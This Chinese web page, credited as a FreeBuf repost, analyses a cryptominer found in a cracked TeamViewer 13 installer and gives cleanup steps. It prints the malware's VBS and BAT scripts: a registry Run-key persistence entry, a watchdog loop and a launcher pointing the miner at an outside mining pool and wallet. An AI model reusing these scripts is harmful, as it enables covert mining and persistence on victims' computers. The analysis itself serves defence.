当前位置:首页 > 问答百科 > 正文内容

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)

福瑞号2023-05-12 19:26:27问答百科107

不提供TeamViewer激活码分享,建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。



你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图1

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图2

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图3

直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图4

0.Servicecrsssr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat:

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat:

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了,看看到底挖了多少钱。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图5

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图6

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图7

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图8

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图9

0×4病毒清理

事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2:清除注册表

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图10

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载自FreeBuf.COM

扫描二维码推送至手机访问。

版权声明:本文由福瑞号发布,如需转载请注明出处。

本文链接:http://furui.com.cn/174981.html

“teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)” 的相关文章

填写完整的QQ群资料该怎样填写(写材料无从下笔怎么办)

填写完整的QQ群资料该怎样填写(写材料无从下笔怎么办)

作为一名体制内“打工人”,你是不是也有这样的体验: 有点笔头功夫的人,在机关单位最“抢手”;写不好材料的人,到哪个科室都不受欢迎。 可让你苦恼的是,自己却是材料“小白”一枚: 接到领导交办的材料任务就发懵,不知从何下笔,对着电脑抓耳挠腮、苦思半天,屏幕上还只“敲”了一个标题。 好不容易像挤牙膏似地“...

莆田系是指什么意思(为什么叫莆田系)

莆田系是指什么意思(为什么叫莆田系)

这是三双耐克在20年前发出的aj one烟灰小雕,我们分别以左中右的顺序排列,屏幕前眼睛的各位网友们能看得出哪双是正品吗?答案技巧。左边是我某位炒鞋爱好者朋友在官网上用999买的正品,中间是他朋友介绍的某莆田高仿价值500元,而右边是在闲鱼随便找了家图多的买的售价288元,怎么样?大家猜对了吗?...

腊月二十九有什么习俗(今年没有年三十)

腊月二十九有什么习俗(今年没有年三十)

今年是没有大年三十的一年,腊月二十九直接就是除夕了,但是在原本的年俗里,腊月二十九也有着自己的独特习俗,你知道腊月二十九原本是要干嘛么?在这原本除夕的前一天,你知道这天原本都要准备一些什么吗? 在以前庆贺新春佳节之前,大家在腊月二十九这天,很多地方是要去上坟请祖先的,你知道是为啥吗?这天还要去集市打...

电视剧死亡笔记男主的扮演者是谁(太可惜)

电视剧死亡笔记男主的扮演者是谁(太可惜)

如今的世道, 鲜肉当道,整容横行 ,新出来的演员只要是有点姿色,没有演技, 照样头条、广告接不停, 本来,炮哥要拿曾经喜欢过的鲜肉们跟现在的比对比对, 但没想到他们都不争气地长残了。( ) 松山健一 松山健一 曾经的男神, 《死亡笔记》 的男主,他就是“L”的扮演者, 松山健一,对于漫...

2020中秋节是哪一天(中秋节那些事)

2020中秋节是哪一天(中秋节那些事)

导读:在中秋佳节即将来临的时候,我们有必要普及一下中秋的有关知识,比如什么时候是中秋节?是阳历还是农历?中秋节的农村一些风俗等,今天我们一起来聊一聊。 时间真快,俗话说“年怕中秋,月怕半”,说明到中秋节的时候一年时间很快就要过去了,还有三个半月就到春节了。而一个月的的时间就怕每个月的15号,过了1...